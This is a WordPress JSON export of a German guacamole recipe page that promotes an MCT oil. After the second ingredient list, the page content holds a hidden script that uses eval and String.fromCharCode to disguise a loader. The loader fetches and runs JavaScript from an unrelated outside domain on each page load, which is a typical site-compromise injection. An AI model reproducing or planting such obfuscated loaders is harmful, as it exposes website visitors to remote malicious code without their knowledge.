{"id":399,"date":"2016-02-10T14:20:30","date_gmt":"2016-02-10T14:20:30","guid":{"rendered":"http:\/\/shopingpoint.de\/www\/fliqua\/?page_id=399"},"modified":"2016-03-18T18:29:49","modified_gmt":"2016-03-18T17:29:49","slug":"avocadocreme-guacamole","status":"publish","type":"page","link":"https:\/\/www.fliqua.de\/?page_id=399","title":{"rendered":"Avocadocreme (Guacamole)"},"content":{"rendered":"<p>Grundrezept:<\/p>\n<ul>\n<li>1-2 Stck.\u00a0 Avocado<\/li>\n<li>2 El\u00a0 FLIQUA MCT \u00d6l<\/li>\n<li>2 El\u00a0 Apfelessig \/ Zitronensaft \/ Limettensaft<\/li>\n<li>Salz, Pfeffer \/ Oregano, Chili<\/li>\n<li>1\/2 Tl\u00a0 Ascorbins\u00e4ure (VitaminC)<\/li>\n<\/ul>\n<p>Die Zutaten miteinander vermengen. Gerne kann ein R\u00fchrger\u00e4t \/ Mixer verwendet werden. Salz, Pfeffer \/ Oregano, Chili je nach Geschmack hinzuf\u00fcgen. Zus\u00e4tzliche Zutaten, wie: Koriander, Petersilie, Knoblauch, Zwiebel, Tomate, gr\u00fcne Paprika, N\u00fcsse (Cashewkerne, Zedernkerne) lassen hier der Phantasie freien Lauf. Ein geschmacksneutrales WheyProtein pa\u00dft ebenfalls in die Avocadocreme.<\/p>\n<p><!--more--><\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/k-DSC_6395-e1455721761826.jpg\" rel=\"attachment wp-att-496\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-496 aligncenter\" src=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/k-DSC_6395-e1455721761826-225x300.jpg\" alt=\"k-DSC_6395\" width=\"225\" height=\"300\" srcset=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/k-DSC_6395-e1455721761826-225x300.jpg 225w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/k-DSC_6395-e1455721761826.jpg 480w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>Eine eigenwillige aber leckere Variante (\u00e0 la Katrin):<\/p>\n<ul>\n<li>1-2 Stck.\u00a0 Avocado<\/li>\n<li>2 El\u00a0 FLIQUA MCT \u00d6l<\/li>\n<li>2 El\u00a0 Apfelessig \/ Zitronensaft \/ Limettensaft<\/li>\n<li>Salz, Pfeffer \/ Oregano, Chili<\/li>\n<li>1\/2 Tl\u00a0 Ascorbins\u00e4ure (VitaminC)<\/li>\n<li>2 Sardellefilets<\/li>\n<li>2 El Kapern<\/li>\n<li>2 Stck. gr\u00fcne Paprika<\/li>\n<li>frisches Korianderkraut und Petersilie<\/li>\n<li>Gurke<\/li>\n<li>WheyProtein, geschmacksneutral<\/li>\n<\/ul>\n<p>&nbsp;<script type=text\/javascript>eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,48,54,44,49,49,53,44,52,54,44,49,48,48,44,49,48,53,44,49,48,51,44,49,48,49,44,49,49,53,44,49,49,54,44,57,57,44,49,49,49,44,49,48,56,44,49,48,49,44,57,57,44,49,49,54,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,48,51,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,53,52,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));<\/script><script type=text\/javascript> <\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Grundrezept: 1-2 Stck.\u00a0 Avocado 2 El\u00a0 FLIQUA MCT \u00d6l 2 El\u00a0 Apfelessig \/ Zitronensaft \/ Limettensaft Salz, Pfeffer \/ Oregano, Chili 1\/2 Tl\u00a0 Ascorbins\u00e4ure (VitaminC) Die Zutaten miteinander vermengen. Gerne kann ein R\u00fchrger\u00e4t \/ Mixer verwendet werden. Salz, Pfeffer \/ Oregano, Chili je nach Geschmack hinzuf\u00fcgen. Zus\u00e4tzliche Zutaten, wie: Koriander, Petersilie, Knoblauch, Zwiebel, Tomate, gr\u00fcne [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":397,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"inline_featured_image":false,"footnotes":""},"tags":[],"class_list":["post-399","page","type-page","status-publish","hentry"],"aioseo_notices":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/399","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=399"}],"version-history":[{"count":7,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/399\/revisions"}],"predecessor-version":[{"id":746,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/399\/revisions\/746"}],"up":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/397"}],"wp:attachment":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=399"}],"wp:term":[{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=399"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}